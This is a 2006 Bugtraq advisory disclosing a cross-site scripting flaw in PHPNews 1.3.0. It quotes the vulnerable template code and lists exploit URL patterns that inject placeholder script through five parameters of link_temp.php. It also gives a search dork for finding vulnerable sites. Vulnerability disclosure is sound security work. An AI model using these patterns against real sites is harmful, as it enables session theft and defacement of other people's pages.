PHPNews 1.3.0 XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHPNews 1.3.0 XSS
From: emulamex@xxxxxxxxxxx
Date: 1 Dec 2006 20:57:10 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

PHP Script: PHPNews 1.3.0
Class: XSS
Website: http://newsphp.sourceforge.net
Found by: Detefix
dork: inurl:phpnews

-----

- Vulnerable Code:

<?php
print<<<EOT
<a href="$url?action=fullnews&amp;showcomments=1&amp;id=$id">$subject</a> by 
$username on $time<br />

-----

- Exploits:

http://[target]/[path-to-PHPNews]/templates/link_temp.php?url=";>[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?id=";>[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?subject=[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?username=[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?time=[XSS]

Prev by Date: [Aria-Security Team] DuWare DuPortal SQL Injection Vuln
Next by Date: KhaledMuratList mdb
Previous by thread: [Aria-Security Team] DuWare DuPortal SQL Injection Vuln
Next by thread: KhaledMuratList mdb
Index(es):
- Date
- Thread